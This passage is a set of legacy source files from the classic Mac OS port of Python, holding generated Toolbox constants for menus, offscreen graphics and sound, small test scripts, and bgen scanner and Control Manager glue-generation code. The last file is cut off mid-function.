kMenuSizeMsg = 2
kMenuDrawItemMsg = 4
kMenuCalcItemMsg = 5
kMenuThemeSavvyMsg = 7
mDrawMsg = 0
mChooseMsg = 1
mSizeMsg = 2
mDrawItemMsg = 4
mCalcItemMsg = 5
kThemeSavvyMenuResponse = 0x7473
textMenuProc = 0
hMenuCmd = 27
hierMenu = -1
mPopUpMsg = 3
mctAllItems = -98
mctLastIDIndic = -99
gestaltContextualMenuAttr = FOUR_CHAR_CODE('cmnu')
gestaltContextualMenuUnusedBit = 0
gestaltContextualMenuTrapAvailable = 1
kCMHelpItemNoHelp = 0
kCMHelpItemAppleGuide = 1
kCMHelpItemOtherHelp = 2
kCMNothingSelected = 0
kCMMenuItemSelected = 1
kCMShowHelpSelected = 3
```
#### File: Lib/lib-toolbox/QDOffscreen.py
```python
def FOUR_CHAR_CODE(x): return x
pixPurgeBit = 0
noNewDeviceBit = 1
useTempMemBit = 2
keepLocalBit = 3
pixelsPurgeableBit = 6
pixelsLockedBit = 7
mapPixBit = 16
newDepthBit = 17
alignPixBit = 18
newRowBytesBit = 19
reallocPixBit = 20
clipPixBit = 28
stretchPixBit = 29
ditherPixBit = 30
gwFlagErrBit = 31
pixPurge = 1L << pixPurgeBit
noNewDevice = 1L << noNewDeviceBit
useTempMem = 1L << useTempMemBit
keepLocal = 1L << keepLocalBit
pixelsPurgeable = 1L << pixelsPurgeableBit
pixelsLocked = 1L << pixelsLockedBit
kAllocDirectDrawSurface = 1L << 14
mapPix = 1L << mapPixBit
newDepth = 1L << newDepthBit
alignPix = 1L << alignPixBit
newRowBytes = 1L << newRowBytesBit
reallocPix = 1L << reallocPixBit
clipPix = 1L << clipPixBit
stretchPix = 1L << stretchPixBit
ditherPix = 1L << ditherPixBit
gwFlagErr = 1L << gwFlagErrBit
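# Sketch: these are bit flags intended to be OR-ed into a GWorld flags word,
# e.g. (hypothetical combination)
#   flags = noNewDevice | useTempMem | pixelsPurgeable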
```
#### File: Lib/lib-toolbox/Sound.py
```python
def FOUR_CHAR_CODE(x): return x
soundListRsrc = FOUR_CHAR_CODE('snd ')
kSimpleBeepID = 1
rate22050hz = 0x56220000
rate22khz = 0x56EE8BA3
rate11khz = 0x2B7745D1
rate11025hz = 0x2B110000
squareWaveSynth = 1
waveTableSynth = 3
sampledSynth = 5
MACE3snthID = 11
MACE6snthID = 13
kMiddleC = 60
kNoVolume = 0
kFullVolume = 0x0100
stdQLength = 128
dataOffsetFlag = 0x8000
kUseOptionalOutputDevice = -1
notCompressed = 0
fixedCompression = -1
variableCompression = -2
twoToOne = 1
eightToThree = 2
threeToOne = 3
sixToOne = 4
sixToOnePacketSize = 8
threeToOnePacketSize = 16
stateBlockSize = 64
leftOverBlockSize = 32
firstSoundFormat = 0x0001
secondSoundFormat = 0x0002
dbBufferReady = 0x00000001
dbLastBuffer = 0x00000004
sysBeepDisable = 0x0000
unitTypeNoSelection = 0xFFFF
unitTypeSeconds = 0x0000
stdSH = 0x00
extSH = 0xFF
cmpSH = 0xFE
nullCmd = 0
initCmd = 1
freeCmd = 2
quietCmd = 3
flushCmd = 4
reInitCmd = 5
waitCmd = 10
pauseCmd = 11
resumeCmd = 12
callBackCmd = 13
syncCmd = 14
availableCmd = 24
versionCmd = 25
totalLoadCmd = 26
loadCmd = 27
freqDurationCmd = 40
restCmd = 41
freqCmd = 42
ampCmd = 43
timbreCmd = 44
getAmpCmd = 45
volumeCmd = 46
getVolumeCmd = 47
clockComponentCmd = 50
getClockComponentCmd = 51
scheduledSoundCmd = 52
linkSoundComponentsCmd = 53
waveTableCmd = 60
phaseCmd = 61
soundCmd = 80
bufferCmd = 81
rateCmd = 82
continueCmd = 83
doubleBufferCmd = 84
getRateCmd = 85
rateMultiplierCmd = 86
getRateMultiplierCmd = 87
sizeCmd = 90
convertCmd = 91
waveInitChannelMask = 0x07
waveInitChannel0 = 0x04
waveInitChannel1 = 0x05
waveInitChannel2 = 0x06
waveInitChannel3 = 0x07
initChan0 = waveInitChannel0
initChan1 = waveInitChannel1
initChan2 = waveInitChannel2
initChan3 = waveInitChannel3
outsideCmpSH = 0
insideCmpSH = 1
aceSuccess = 0
aceMemFull = 1
aceNilBlock = 2
aceBadComp = 3
aceBadEncode = 4
aceBadDest = 5
aceBadCmd = 6
initChanLeft = 0x0002
initChanRight = 0x0003
initNoInterp = 0x0004
initNoDrop = 0x0008
initMono = 0x0080
initStereo = 0x00C0
initMACE3 = 0x0300
initMACE6 = 0x0400
initPanMask = 0x0003
initSRateMask = 0x0030
initStereoMask = 0x00C0
initCompMask = 0xFF00
siActiveChannels = FOUR_CHAR_CODE('chac')
siActiveLevels = FOUR_CHAR_CODE('lmac')
siAGCOnOff = FOUR_CHAR_CODE('agc ')
siAsync = FOUR_CHAR_CODE('asyn')
siAVDisplayBehavior = FOUR_CHAR_CODE('avdb')
siChannelAvailable = FOUR_CHAR_CODE('chav')
siCompressionAvailable = FOUR_CHAR_CODE('cmav')
siCompressionFactor = FOUR_CHAR_CODE('cmfa')
siCompressionHeader = FOUR_CHAR_CODE('cmhd')
siCompressionNames = FOUR_CHAR_CODE('cnam')
siCompressionParams = FOUR_CHAR_CODE('evaw')
siCompressionType = FOUR_CHAR_CODE('comp')
siContinuous = FOUR_CHAR_CODE('cont')
siDecompressionParams = FOUR_CHAR_CODE('wave')
siDeviceBufferInfo = FOUR_CHAR_CODE('dbin')
siDeviceConnected = FOUR_CHAR_CODE('dcon')
siDeviceIcon = FOUR_CHAR_CODE('icon')
siDeviceName = FOUR_CHAR_CODE('name')
siHardwareBalance = FOUR_CHAR_CODE('hbal')
siHardwareBalanceSteps = FOUR_CHAR_CODE('hbls')
siHardwareBass = FOUR_CHAR_CODE('hbas')
siHardwareBassSteps = FOUR_CHAR_CODE('hbst')
siHardwareBusy = FOUR_CHAR_CODE('hwbs')
siHardwareFormat = FOUR_CHAR_CODE('hwfm')
siHardwareMute = FOUR_CHAR_CODE('hmut')
siHardwareTreble = FOUR_CHAR_CODE('htrb')
siHardwareTrebleSteps = FOUR_CHAR_CODE('hwts')
siHardwareVolume = FOUR_CHAR_CODE('hvol')
siHardwareVolumeSteps = FOUR_CHAR_CODE('hstp')
siHeadphoneMute = FOUR_CHAR_CODE('pmut')
siHeadphoneVolume = FOUR_CHAR_CODE('pvol')
siHeadphoneVolumeSteps = FOUR_CHAR_CODE('hdst')
siInputAvailable = FOUR_CHAR_CODE('inav')
siInputGain = FOUR_CHAR_CODE('gain')
siInputSource = FOUR_CHAR_CODE('sour')
siInputSourceNames = FOUR_CHAR_CODE('snam')
siLevelMeterOnOff = FOUR_CHAR_CODE('lmet')
siModemGain = FOUR_CHAR_CODE('mgai')
siMonitorAvailable = FOUR_CHAR_CODE('mnav')
siMonitorSource = FOUR_CHAR_CODE('mons')
siNumberChannels = FOUR_CHAR_CODE('chan')
siOptionsDialog = FOUR_CHAR_CODE('optd')
siOSTypeInputSource = FOUR_CHAR_CODE('inpt')
siOSTypeInputAvailable = FOUR_CHAR_CODE('inav')
siPlayThruOnOff = FOUR_CHAR_CODE('plth')
siPostMixerSoundComponent = FOUR_CHAR_CODE('psmx')
siPreMixerSoundComponent = FOUR_CHAR_CODE('prmx')
siQuality = FOUR_CHAR_CODE('qual')
siRateMultiplier = FOUR_CHAR_CODE('rmul')
siRecordingQuality = FOUR_CHAR_CODE('qual')
siSampleRate = FOUR_CHAR_CODE('srat')
siSampleRateAvailable = FOUR_CHAR_CODE('srav')
siSampleSize = FOUR_CHAR_CODE('ssiz')
siSampleSizeAvailable = FOUR_CHAR_CODE('ssav')
siSetupCDAudio = FOUR_CHAR_CODE('sucd')
siSetupModemAudio = FOUR_CHAR_CODE('sumd')
siSlopeAndIntercept = FOUR_CHAR_CODE('flap')
siSoundClock = FOUR_CHAR_CODE('sclk')
siUseThisSoundClock = FOUR_CHAR_CODE('sclc')
siSpeakerMute = FOUR_CHAR_CODE('smut')
siSpeakerVolume = FOUR_CHAR_CODE('svol')
siSSpCPULoadLimit = FOUR_CHAR_CODE('3dll')
siSSpLocalization = FOUR_CHAR_CODE('3dif')
siSSpSpeakerSetup = FOUR_CHAR_CODE('3dst')
siStereoInputGain = FOUR_CHAR_CODE('sgai')
siSubwooferMute = FOUR_CHAR_CODE('bmut')
siTwosComplementOnOff = FOUR_CHAR_CODE('twos')
siVolume = FOUR_CHAR_CODE('volu')
siVoxRecordInfo = FOUR_CHAR_CODE('voxr')
siVoxStopInfo = FOUR_CHAR_CODE('voxs')
siWideStereo = FOUR_CHAR_CODE('wide')
siCloseDriver = FOUR_CHAR_CODE('clos')
siInitializeDriver = FOUR_CHAR_CODE('init')
siPauseRecording = FOUR_CHAR_CODE('paus')
siUserInterruptProc = FOUR_CHAR_CODE('user')
kNoSource = FOUR_CHAR_CODE('none')
kCDSource = FOUR_CHAR_CODE('cd ')
kExtMicSource = FOUR_CHAR_CODE('emic')
kRCAInSource = FOUR_CHAR_CODE('irca')
kTVFMTunerSource = FOUR_CHAR_CODE('tvfm')
kDAVInSource = FOUR_CHAR_CODE('idav')
kIntMicSource = FOUR_CHAR_CODE('imic')
kMediaBaySource = FOUR_CHAR_CODE('mbay')
kModemSource = FOUR_CHAR_CODE('modm')
kPCCardSource = FOUR_CHAR_CODE('pcm ')
kZoomVideoSource = FOUR_CHAR_CODE('zvpc')
kDVDSource = FOUR_CHAR_CODE('dvda')
kNoSoundComponentType = FOUR_CHAR_CODE('****')
kSoundComponentType = FOUR_CHAR_CODE('sift')
kSoundComponentPPCType = FOUR_CHAR_CODE('nift')
kRate8SubType = FOUR_CHAR_CODE('ratb')
kRate16SubType = FOUR_CHAR_CODE('ratw')
kConverterSubType = FOUR_CHAR_CODE('conv')
kSndSourceSubType = FOUR_CHAR_CODE('sour')
kMixerType = FOUR_CHAR_CODE('mixr')
kMixer8SubType = FOUR_CHAR_CODE('mixb')
kMixer16SubType = FOUR_CHAR_CODE('mixw')
kSoundInputDeviceType = FOUR_CHAR_CODE('sinp')
kWaveInSubType = FOUR_CHAR_CODE('wavi')
kSoundOutputDeviceType = FOUR_CHAR_CODE('sdev')
kClassicSubType = FOUR_CHAR_CODE('clas')
kASCSubType = FOUR_CHAR_CODE('asc ')
kDSPSubType = FOUR_CHAR_CODE('dsp ')
kAwacsSubType = FOUR_CHAR_CODE('awac')
kGCAwacsSubType = FOUR_CHAR_CODE('awgc')
kSingerSubType = FOUR_CHAR_CODE('sing')
kSinger2SubType = FOUR_CHAR_CODE('sng2')
kWhitSubType = FOUR_CHAR_CODE('whit')
kSoundBlasterSubType = FOUR_CHAR_CODE('sbls')
kWaveOutSubType = FOUR_CHAR_CODE('wavo')
kDirectSoundSubType = FOUR_CHAR_CODE('dsnd')
kUNIXsdevSubType = FOUR_CHAR_CODE('un1x')
kSoundCompressor = FOUR_CHAR_CODE('scom')
kSoundDecompressor = FOUR_CHAR_CODE('sdec')
kAudioComponentType = FOUR_CHAR_CODE('adio')
kAwacsPhoneSubType = FOUR_CHAR_CODE('hphn')
kAudioVisionSpeakerSubType = FOUR_CHAR_CODE('telc')
kAudioVisionHeadphoneSubType = FOUR_CHAR_CODE('telh')
kPhilipsFaderSubType = FOUR_CHAR_CODE('tvav')
kSGSToneSubType = FOUR_CHAR_CODE('sgs0')
kSoundEffectsType = FOUR_CHAR_CODE('snfx')
kSSpLocalizationSubType = FOUR_CHAR_CODE('snd3')
kSoundNotCompressed = FOUR_CHAR_CODE('NONE')
k8BitOffsetBinaryFormat = FOUR_CHAR_CODE('raw ')
k16BitBigEndianFormat = FOUR_CHAR_CODE('twos')
k16BitLittleEndianFormat = FOUR_CHAR_CODE('sowt')
kFloat32Format = FOUR_CHAR_CODE('fl32')
kFloat64Format = FOUR_CHAR_CODE('fl64')
k24BitFormat = FOUR_CHAR_CODE('in24')
k32BitFormat = FOUR_CHAR_CODE('in32')
kMACE3Compression = FOUR_CHAR_CODE('MAC3')
kMACE6Compression = FOUR_CHAR_CODE('MAC6')
kCDXA4Compression = FOUR_CHAR_CODE('cdx4')
kCDXA2Compression = FOUR_CHAR_CODE('cdx2')
kIMACompression = FOUR_CHAR_CODE('ima4')
kULawCompression = FOUR_CHAR_CODE('ulaw')
kALawCompression = FOUR_CHAR_CODE('alaw')
kMicrosoftADPCMFormat = 0x6D730002
kDVIIntelIMAFormat = 0x6D730011
kDVAudioFormat = FOUR_CHAR_CODE('dvca')
kOffsetBinary = k8BitOffsetBinaryFormat
kTwosComplement = k16BitBigEndianFormat
kLittleEndianFormat = k16BitLittleEndianFormat
# Both byte-order variants of these aliases appear here (the header appears
# to define them under an endianness #ifdef); the later, big-endian
# (classic Mac OS) pair is the one that takes effect.
k16BitNativeEndianFormat = k16BitLittleEndianFormat
k16BitNonNativeEndianFormat = k16BitBigEndianFormat
k16BitNativeEndianFormat = k16BitBigEndianFormat
k16BitNonNativeEndianFormat = k16BitLittleEndianFormat
kInputMask = 0x000000FF
kOutputMask = 0x0000FF00
kOutputShift = 8
kActionMask = 0x00FF0000
kSoundComponentBits = 0x00FFFFFF
kAudioFormatAtomType = FOUR_CHAR_CODE('frma')
kAudioEndianAtomType = FOUR_CHAR_CODE('enda')
kAudioTerminatorAtomType = 0
kAVDisplayHeadphoneRemove = 0
kAVDisplayHeadphoneInsert = 1
kAVDisplayPlainTalkRemove = 2
kAVDisplayPlainTalkInsert = 3
audioAllChannels = 0
audioLeftChannel = 1
audioRightChannel = 2
audioUnmuted = 0
audioMuted = 1
siCDQuality = FOUR_CHAR_CODE('cd ')
siBestQuality = FOUR_CHAR_CODE('best')
siBetterQuality = FOUR_CHAR_CODE('betr')
siGoodQuality = FOUR_CHAR_CODE('good')
siDeviceIsConnected = 1
siDeviceNotConnected = 0
siDontKnowIfConnected = -1
siReadPermission = 0
siWritePermission = 1
kScheduledSoundDoScheduled = 1 << 0
kScheduledSoundDoCallBack = 1 << 1
kSoundComponentInitOutputDeviceSelect = 0x0001
kSoundComponentSetSourceSelect = 0x0002
kSoundComponentGetSourceSelect = 0x0003
kSoundComponentGetSourceDataSelect = 0x0004
kSoundComponentSetOutputSelect = 0x0005
kSoundComponentAddSourceSelect = 0x0101
kSoundComponentRemoveSourceSelect = 0x0102
kSoundComponentGetInfoSelect = 0x0103
kSoundComponentSetInfoSelect = 0x0104
kSoundComponentStartSourceSelect = 0x0105
kSoundComponentStopSourceSelect = 0x0106
kSoundComponentPauseSourceSelect = 0x0107
kSoundComponentPlaySourceBufferSelect = 0x0108
kAudioGetVolumeSelect = 0x0000
kAudioSetVolumeSelect = 0x0001
kAudioGetMuteSelect = 0x0002
kAudioSetMuteSelect = 0x0003
kAudioSetToDefaultsSelect = 0x0004
kAudioGetInfoSelect = 0x0005
kAudioGetBassSelect = 0x0006
kAudioSetBassSelect = 0x0007
kAudioGetTrebleSelect = 0x0008
kAudioSetTrebleSelect = 0x0009
kAudioGetOutputDeviceSelect = 0x000A
kAudioMuteOnEventSelect = 0x0081
kDelegatedSoundComponentSelectors = 0x0100
kSndInputReadAsyncSelect = 0x0001
kSndInputReadSyncSelect = 0x0002
kSndInputPauseRecordingSelect = 0x0003
kSndInputResumeRecordingSelect = 0x0004
kSndInputStopRecordingSelect = 0x0005
kSndInputGetStatusSelect = 0x0006
kSndInputGetDeviceInfoSelect = 0x0007
kSndInputSetDeviceInfoSelect = 0x0008
kSndInputInitHardwareSelect = 0x0009
```
#### File: Mac/Lib/quietconsole.py
```python
import types
import sys
class _PseudoStdin:
def __init__(self, stdouterr):
self.keep_stdin = sys.stdin
sys.stdin = self
self.keep_stdouterr = stdouterr
def __del__(self):
self.keep_stdin = self.keep_stdouterr = None
def _revert(self):
"""Return to old state, with true stdio"""
if self.keep_stdin == None:
return
sys.stdin = self.keep_stdin
self.keep_stdin = None
self.keep_stdouterr._revert(1)
self.keep_stdouterr = None
def read(self, *args):
self._revert()
return apply(sys.stdin.read, args)
def readlines(self, *args):
self._revert()
return apply(sys.stdin.readlines, args)
def readline(self, *args):
self._revert()
return apply(sys.stdin.readline, args)
def close(self):
self._revert()
sys.stdin.close()
class _PseudoStdouterr:
def __init__(self):
self.keep_stdout = sys.stdout
self.keep_stderr = sys.stderr
sys.stdout = sys.stderr = self
self.data = []
def __del__(self):
self.keep_stdout = self.keep_stderr = None
def _revert(self, dumpdata=0):
if self.keep_stdout == None:
return
sys.stdout = self.keep_stdout
sys.stderr = self.keep_stderr
        self.keep_stdout = self.keep_stderr = None
if dumpdata and self.data:
for d in self.data:
sys.stdout.write(d)
self.data = None
def write(self, arg):
self.data.append(arg)
def writelines(self, arg):
for d in arg:
            self.data.append(d)
def close(self):
self.keep_stdout = self.keep_stderr = self.data = None
beenhere = 0
def install():
global beenhere
if beenhere:
return
beenhere = 1
# There's no point in re-installing if the console has been active
obj = _PseudoStdouterr()
_PseudoStdin(obj)
# No need to keep the objects, they're saved in sys.std{in,out,err}
def revert():
if type(sys.stdin) == types.FileType:
return # Not installed
sys.stdin._revert()
def _test():
import time
install()
print "You will not see this yet"
time.sleep(1)
print "You will not see this yet"
time.sleep(1)
print "You will not see this yet"
time.sleep(1)
print "You will not see this yet"
time.sleep(1)
print "You will not see this yet"
time.sleep(1)
print "5 seconds have passed, now you may type something"
rv = sys.stdin.readline()
print "You typed", rv
if __name__ == '__main__':
_test()
```
#### File: Lib/test/cmtest.py
```python
import Cm
import Res
import sys
def getstr255(r):
"""Get string from str255 resource"""
if not r.data: return ''
len = ord(r.data[0])
return r.data[1:1+len]
def getinfo(c):
"""Return (type, subtype, creator, fl1, fl2, name, description) for component"""
h1 = Res.Resource('')
h2 = Res.Resource('')
h3 = Res.Resource('')
type, subtype, creator, fl1, fl2 = c.GetComponentInfo(h1, h2, h3)
name = getstr255(h1)
description = getstr255(h2)
return type, subtype, creator, fl1, fl2, name, description
def getallcomponents():
"""Return list with info for all components, sorted"""
any = ('\0\0\0\0', '\0\0\0\0', '\0\0\0\0', 0, 0)
c = None
rv = []
while 1:
try:
c = Cm.FindNextComponent(c, any)
except Cm.Error:
break
rv.append(getinfo(c))
rv.sort()
return rv
def main():
"""Print info for all components"""
info = getallcomponents()
for type, subtype, creator, f1, f2, name, description in info:
print '%4.4s %4.4s %4.4s %s 0x%x 0x%x'%(type, subtype, creator, name, f1, f2)
print ' ', description
sys.exit(1)
main()
```
#### File: Lib/test/testfinderopen.py
```python
import Finder_7_0_Suite
import aetools
import MacOS
import sys
import macfs
SIGNATURE='MACS'
class Finder(aetools.TalkTo, Finder_7_0_Suite.Finder_7_0_Suite):
pass
def open_in_finder(file):
"""Open a file thru the finder. Specify file by name or fsspec"""
finder = Finder(SIGNATURE)
fss = macfs.FSSpec(file)
vRefNum, parID, name = fss.as_tuple()
dir_fss = macfs.FSSpec((vRefNum, parID, ''))
file_alias = fss.NewAlias()
dir_alias = dir_fss.NewAlias()
return finder.open(file_alias, items=[file_alias])
def main():
fss, ok = macfs.PromptGetFile('File to launch:')
if not ok: sys.exit(0)
result = open_in_finder(fss)
if result:
print 'Result: ', result
if __name__ == '__main__':
main()
```
#### File: Lib/test/twedit.py
```python
from FrameWork import *
import Win
import Qd
import waste
import WASTEconst
import os
import EasyDialogs
class WasteWindow(Window):
def open(self, name):
r = (40, 40, 400, 300)
w = Win.NewWindow(r, name, 1, 0, -1, 1, 0x55555555)
r2 = (0, 0, 400-40-16, 300-40-16)
Qd.SetPort(w)
flags = WASTEconst.weDoAutoScroll | WASTEconst.weDoOutlineHilite | \
WASTEconst.weDoMonoStyled
self.ted = waste.WENew(r2, r2, flags)
w.DrawGrowIcon()
self.wid = w
self.do_postopen()
def do_idle(self):
self.ted.WEIdle()
def do_activate(self, onoff, evt):
if onoff:
self.ted.WEActivate()
else:
self.ted.WEDeactivate()
def do_update(self, wid, event):
Qd.EraseRect(wid.GetWindowPort().portRect)
self.ted.WEUpdate(wid.GetWindowPort().visRgn)
def do_contentclick(self, local, modifiers, evt):
(what, message, when, where, modifiers) = evt
self.ted.WEClick(local, modifiers, when)
def do_char(self, ch, event):
(what, message, when, where, modifiers) = event
self.ted.WEKey(ord(ch), modifiers)
class TestWaste(Application):
def __init__(self):
Application.__init__(self)
self.num = 0
self.listoflists = []
def makeusermenus(self):
self.filemenu = m = Menu(self.menubar, "File")
self.newitem = MenuItem(m, "New window...", "O", self.open)
self.quititem = MenuItem(m, "Quit", "Q", self.quit)
def open(self, *args):
w = WasteWindow(self)
w.open('Window %d'%self.num)
self.num = self.num + 1
self.listoflists.append(w)
def quit(self, *args):
raise self
def do_about(self, id, item, window, event):
EasyDialogs.Message("""Test the WASTE interface.
Simple window in which you can type""")
def do_idle(self, *args):
for l in self.listoflists:
l.do_idle()
def main():
print 'Open app'
App = TestWaste()
print 'run'
App.mainloop()
if __name__ == '__main__':
main()
```
#### File: Modules/ae/aescan.py
```python
import sys
import os
import string
import regex
import regsub
import MacOS
BGENDIR=os.path.join(sys.prefix, ':Tools:bgen:bgen')
sys.path.append(BGENDIR)
from bgenlocations import TOOLBOXDIR
from scantools import Scanner
def main():
print "=== Scanning AERegistry.h for defines ==="
input = "AERegistry.h"
output = "@dummy-registry.py"
defsoutput = TOOLBOXDIR + "AERegistry.py"
scanner = AppleEventsRegScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Scanning AEObjects.h for defines ==="
# XXXX This isn't correct. We only scan AEObjects.h for defines, but there
# are some functions in there that are probably useful (the accessor stuff)
# once we start writing servers in python.
input = "AEObjects.h"
output = "@dummy-objects.py"
defsoutput = TOOLBOXDIR + "AEObjects.py"
scanner = AppleEventsScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Scanning AEDataModel.h ==="
input = "AEDataModel.h"
output = "aedatamodelgen.py"
defsoutput = TOOLBOXDIR + "AEDataModel.py"
scanner = AppleEventsScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Scanning AppleEvents.h ==="
input = "AppleEvents.h"
output = "aegen.py"
defsoutput = TOOLBOXDIR + "AppleEvents.py"
scanner = AppleEventsRegScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Done Scanning and Generating, now doing 'import aesupport' ==="
import aesupport
print "=== Done 'import aesupport'. It's up to you to compile AEmodule.c ==="
class AppleEventsScanner(Scanner):
def destination(self, type, name, arglist):
classname = "AEFunction"
listname = "functions"
if arglist:
t, n, m = arglist[0]
if t[-4:] == "_ptr" and m == "InMode" and \
t[:-4] in ("AEDesc", "AEAddressDesc", "AEDescList",
"AERecord", "AppleEvent"):
classname = "AEMethod"
listname = "aedescmethods"
return classname, listname
def makeblacklistnames(self):
return [
"AEDisposeDesc",
# "AEGetEventHandler",
]
def makeblacklisttypes(self):
return [
"ProcPtr",
"AEArrayType",
"AECoercionHandlerUPP",
"UniversalProcPtr",
]
def makerepairinstructions(self):
return [
([("Boolean", "isSysHandler", "InMode")],
[("AlwaysFalse", "*", "*")]),
([("void_ptr", "*", "InMode"), ("Size", "*", "InMode")],
[("InBuffer", "*", "*")]),
([("EventHandlerProcPtr", "*", "InMode"), ("long", "*", "InMode")],
[("EventHandler", "*", "*")]),
([("EventHandlerProcPtr", "*", "OutMode"), ("long", "*", "OutMode")],
[("EventHandler", "*", "*")]),
([("AEEventHandlerUPP", "*", "InMode"), ("long", "*", "InMode")],
[("EventHandler", "*", "*")]),
([("AEEventHandlerUPP", "*", "OutMode"), ("long", "*", "OutMode")],
[("EventHandler", "*", "*")]),
([("void", "*", "OutMode"), ("Size", "*", "InMode"),
("Size", "*", "OutMode")],
[("VarVarOutBuffer", "*", "InOutMode")]),
([("AppleEvent", "theAppleEvent", "OutMode")],
[("AppleEvent_ptr", "*", "InMode")]),
([("AEDescList", "theAEDescList", "OutMode")],
[("AEDescList_ptr", "*", "InMode")]),
]
def writeinitialdefs(self):
self.defsfile.write("def FOUR_CHAR_CODE(x): return x\n")
class AppleEventsRegScanner(AppleEventsScanner):
def writeinitialdefs(self):
self.defsfile.write("def FOUR_CHAR_CODE(x): return x\n")
self.defsfile.write("from AEDataModel import *\n")
if __name__ == "__main__":
main()
```
#### File: Modules/ctl/ctlsupport.py
```python
import string
# Declarations that change for each manager
MACHEADERFILE = 'Controls.h' # The Apple header file
MODNAME = 'Ctl' # The name of the module
OBJECTNAME = 'Control' # The basic name of the objects used here
# The following is *usually* unchanged but may still require tuning
MODPREFIX = MODNAME # The prefix for module-wide routines
OBJECTTYPE = OBJECTNAME + 'Handle' # The C type used to represent them
OBJECTPREFIX = MODPREFIX + 'Obj' # The prefix for object methods
INPUTFILE = string.lower(MODPREFIX) + 'gen.py' # The file generated by the scanner
OUTPUTFILE = MODNAME + "module.c" # The file generated by this program
from macsupport import *
# Create the type objects
ControlHandle = OpaqueByValueType(OBJECTTYPE, OBJECTPREFIX)
ControlRef = ControlHandle
ExistingControlHandle = OpaqueByValueType(OBJECTTYPE, "CtlObj_WhichControl", "BUG")
RgnHandle = OpaqueByValueType("RgnHandle", "ResObj")
CCTabHandle = OpaqueByValueType("CCTabHandle", "ResObj")
AuxCtlHandle = OpaqueByValueType("AuxCtlHandle", "ResObj")
ControlPartCode = Type("ControlPartCode", "h")
DragConstraint = Type("DragConstraint", "h")
ControlVariant = Type("ControlVariant", "h")
IconTransformType = Type("IconTransformType", "h")
ControlButtonGraphicAlignment = Type("ControlButtonGraphicAlignment", "h")
ControlButtonTextAlignment = Type("ControlButtonTextAlignment", "h")
ControlButtonTextPlacement = Type("ControlButtonTextPlacement", "h")
ControlContentType = Type("ControlContentType", "h")
ControlFocusPart = Type("ControlFocusPart", "h")
ControlFontStyleRec = OpaqueType('ControlFontStyleRec', 'ControlFontStyle')
ControlFontStyleRec_ptr = ControlFontStyleRec
includestuff = includestuff + """
#include <%s>""" % MACHEADERFILE + """
#define as_Control(h) ((ControlHandle)h)
#define resNotFound -192 /* Can't include <Errors.h> because of Python's "errors.h" */
extern PyObject *CtlObj_WhichControl(ControlHandle); /* Forward */
extern PyObject *QdRGB_New(RGBColorPtr);
extern QdRGB_Convert(PyObject *, RGBColorPtr);
#ifdef THINK_C
#define ControlActionUPP ProcPtr
#endif
/*
** Parse/generate ControlFontStyleRec records
*/
#if 0 /* Not needed */
PyObject *ControlFontStyle_New(itself)
ControlFontStyleRec *itself;
{
return Py_BuildValue("hhhhhhO&O&", itself->flags, itself->font,
itself->size, itself->style, itself->mode, itself->just,
QdRGB_New, &itself->foreColor, QdRGB_New, &itself->backColor);
}
#endif
ControlFontStyle_Convert(v, itself)
PyObject *v;
ControlFontStyleRec *itself;
{
return PyArg_ParseTuple(v, "hhhhhhO&O&", &itself->flags,
&itself->font, &itself->size, &itself->style, &itself->mode,
&itself->just, QdRGB_Convert, &itself->foreColor,
QdRGB_Convert, &itself->backColor);
}
/* TrackControl callback support */
static PyObject *tracker;
static ControlActionUPP mytracker_upp;
extern int settrackfunc(PyObject *); /* forward */
extern void clrtrackfunc(void); /* forward */
"""
finalstuff = finalstuff + """
PyObject *CtlObj_NewUnmanaged(itself)
ControlHandle itself;
{
ControlObject *it;
if (itself == NULL) return PyMac_Error(resNotFound);
it = PyObject_NEW(ControlObject, &Control_Type);
if (it == NULL) return NULL;
it->ob_itself = itself;
return (PyObject *)it;
}
PyObject *
CtlObj_WhichControl(ControlHandle c)
{
PyObject *it;
if (c == NULL)
it = Py_None;
else {
it = (PyObject *) GetControlReference(c);
/*
** If the refcon is zero or doesn't point back to the Python object
** the control is not ours. Return a temporary object.
*/
if (it == NULL || ((ControlObject *)it)->ob_itself != c)
return CtlObj_NewUnmanaged(c);
}
Py_INCREF(it);
return it;
}
static int
settrackfunc(obj)
PyObject *obj;
{
if (tracker) {
PyErr_SetString(Ctl_Error, "Tracker function in use");
return 0;
}
tracker = obj;
Py_INCREF(tracker);
return 1;
}
static void
clrtrackfunc()
{
Py_XDECREF(tracker);
tracker = 0;
}
static pascal void
mytracker(ctl, part)
ControlHandle ctl;
short part;
{
PyObject *args, *rv=0;
args = Py_BuildValue("(O&i)", CtlObj_WhichControl, ctl, (int)part);
if (args && tracker) {
rv = PyEval_CallObject(tracker, args);
Py_DECREF(args);
}
if (rv)
Py_DECREF(rv);
else
PySys_WriteStderr("TrackControl: exception in tracker function\\n");
}
"""
initstuff = initstuff + """
mytracker_upp = NewControlActionProc(mytracker);
"""
class MyObjectDefinition(ObjectIdentityMixin, GlobalObjectDefinition):
def outputCheckNewArg(self):
Output("if (itself == NULL) return PyMac_Error(resNotFound);")
def outputInitStructMembers(self):
GlobalObjectDefinition.outputInitStructMembers(self)
Output("SetControlReference(itself, (long)it);")
def outputCleanupStructMembers(self):
Output("if (self->ob_itself) SetControlReference(self->ob_itself, (long)0); /* Make it forget about us */")
# Create the generator groups and link them
module = MacModule(MODNAME, MODPREFIX, includestuff, finalstuff, initstuff)
object = MyObjectDefinition(OBJECTNAME, OBJECTPREFIX, OBJECTTYPE)
module.addobject(object)
# Create the generator classes used to populate the lists
Function = OSErrFunctionGenerator
Method = OSErrMethodGenerator
# Create and populate the lists
functions = []
methods = []
execfile(INPUTFILE)
execfile('ctledit.py')
# add the populated lists to the generator groups
for f in functions: module.add(f)
for f in methods: object.add(f)
# Manual generator for TrackControl, due to callback idiosyncrasies
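# The C trampoline mytracker() (see finalstuff above) forwards each
# Control Manager callback to the Python callable stashed via
# settrackfunc(); passing the integer -1 selects the toolbox's built-in
# auto-tracking action instead of a Python callback.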
trackcontrol_body = """
ControlPartCode _rv;
Point startPoint;
ControlActionUPP upp = 0;
PyObject *callback = 0;
if (!PyArg_ParseTuple(_args, "O&|O",
PyMac_GetPoint, &startPoint, &callback))
return NULL;
if (callback && callback != Py_None) {
if (PyInt_Check(callback) && PyInt_AS_LONG(callback) == -1)
upp = (ControlActionUPP)-1;
else {
settrackfunc(callback);
